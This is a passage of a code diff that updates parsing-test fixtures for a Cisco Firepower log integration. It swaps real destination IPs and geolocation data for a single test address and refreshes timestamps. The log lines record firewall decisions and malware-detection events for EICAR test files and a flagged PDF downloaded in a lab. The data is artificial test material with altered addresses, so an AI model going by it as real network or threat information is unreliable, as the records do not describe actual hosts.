DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", "action": "connection-started", @@ -353,7 +356,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "50074", "src_ip": "10.0.1.20", @@ -388,24 +391,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 2 }, "source": { @@ -453,7 +459,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -462,8 +468,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:22:07.428855300Z", - "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", + "ingested": "2021-12-09T13:35:19.255508Z", + "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", "start": "2019-08-15T16:07:00.000Z", @@ -493,7 +499,7 @@ "dns_query": "siem-inside", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -529,26 +535,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -594,7 +600,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { @@ -602,8 +608,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428856300Z", - "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:35:19.255513300Z", + "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -633,7 +639,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "43228", "src_ip": "10.0.1.20", @@ -660,26 +666,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 29001 }, "source": { @@ -737,7 +743,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { @@ -751,8 +757,8 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-09-07T12:22:07.428857300Z", - "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", + "ingested": "2021-12-09T13:35:19.255518700Z", + "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", "start": "2019-08-15T16:07:18.000Z", @@ -781,7 +787,7 @@ "responder_packets": "29001", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", @@ -823,26 +829,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -888,7 +894,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -896,8 +902,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428858300Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:35:19.255524100Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -927,7 +933,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46000", "src_ip": "10.0.1.20", @@ -954,26 +960,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 4 }, "source": { @@ -1028,7 +1034,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -1042,8 +1048,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:22:07.428859400Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:35:19.255529400Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", "start": "2019-08-16T09:33:15.000Z", @@ -1072,7 +1078,7 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", @@ -1166,7 +1172,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428860400Z", + "ingested": "2021-12-09T13:35:19.255534900Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1298,7 +1304,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-09-07T12:22:07.428861400Z", + "ingested": "2021-12-09T13:35:19.255540300Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log index 5a6fe1852f7..fae3c9aebf8 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log @@ -5,6 +5,6 @@ Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100. Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip 2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d -2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d +2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index 38c14663f52..0a3f9cc5b09 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902870600Z", + "ingested": "2021-12-09T13:35:21.450128Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902876600Z", + "ingested": "2021-12-09T13:35:21.450136100Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902877800Z", + "ingested": "2021-12-09T13:35:21.450162100Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902878900Z", + "ingested": "2021-12-09T13:35:21.450167300Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902879800Z", + "ingested": "2021-12-09T13:35:21.450172700Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902880800Z", + "ingested": "2021-12-09T13:35:21.450177500Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902881800Z", + "ingested": "2021-12-09T13:35:21.450181500Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,25 +758,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, - "ip": "213.211.198.62" + "ip": "81.2.69.144" }, "source": { "port": 46004, @@ -828,7 +828,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -836,8 +836,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:08.902882800Z", - "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on 